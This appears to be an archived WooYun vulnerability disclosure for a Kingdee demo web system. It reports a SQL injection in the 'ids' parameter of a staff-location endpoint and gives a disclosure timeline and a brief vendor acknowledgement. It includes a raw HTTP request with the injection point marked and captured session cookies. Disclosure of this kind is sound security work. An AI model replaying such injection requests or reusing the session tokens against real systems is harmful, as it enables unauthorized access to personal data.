乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-04: 厂商已经确认,细节仅向厂商公开 2015-08-14: 细节向核心白帽子及相关领域专家公开 2015-08-24: 细节向普通白帽子公开 2015-09-03: 细节向实习白帽子公开 2015-09-18: 细节向公众公开
听说送很给力的礼物的,我来了
POST /StaffPosition/GetLastLocusByEmpID HTTP/1.1Host: k3xs.kingdee.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://k3xs.kingdee.com/StaffPosition/StaffPositionContent-Length: 22Cookie: _ga=GA1.2.1208085774.1436852166; Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1437438091,1437718560,1438045311,1438649013; pgv_pvi=133623808; __utma=98319621.1208085774.1436852166.1437438091.1437438091.1; __utmz=98319621.1437438091.1.1.utmcsr=job.kingdee.com|utmccn=(referral)|utmcmd=referral|utmcct=/; CNZZDATA1253261474=18132078-1437438233-%7C1438649179; Hm_lpvt_aff7fbe8fcb98b060541077cc76465f2=1438649013; PHPSESSID=0tj3robc2o1hnkdjijlo9iq176; smesc=MTg1YTI5Nzg3NDU4MTRhMGU5MWZiYTZmNmRjNWE1NjM%3D; nts_mail_user=13580111111%3A0%3AV1.0.0; ASP.NET_SessionId=tmbux3wjedykhlvrjbfakcy0; .ASPXAUTH=E95A7F091EAAB66CF9386ACD2C4A744332930B494766E6B0CD85CEDBF71AC2370DB424487859E385991E6E0E6171F1E1FDDFB4E77F99B605E30B14BBD53E140E121AE5288E58FFC6D3A0DB4D0971AD152804813BDFEC9030E3F146A16637BF4289E6D4C4A91D1F04CB746D4BE8FE37AAC124297D2CA03A933FDE2DCE2EBA53411C8945AFE6FC18A09CE236651AAC4C79E758358A0385C603248218C50BC3D734X-Forwarded-For: 8.8.8.8Connection: keep-alivePragma: no-cacheCache-Control: no-cacheids=82*&date=2015-08-04
ids参数没过滤
过滤,来个礼物
危害等级:低
漏洞Rank:5
确认时间:2015-08-04 14:19
谢谢对金蝶安全的关注,此系统为演示系统,我们已通知相关部门处理。
暂无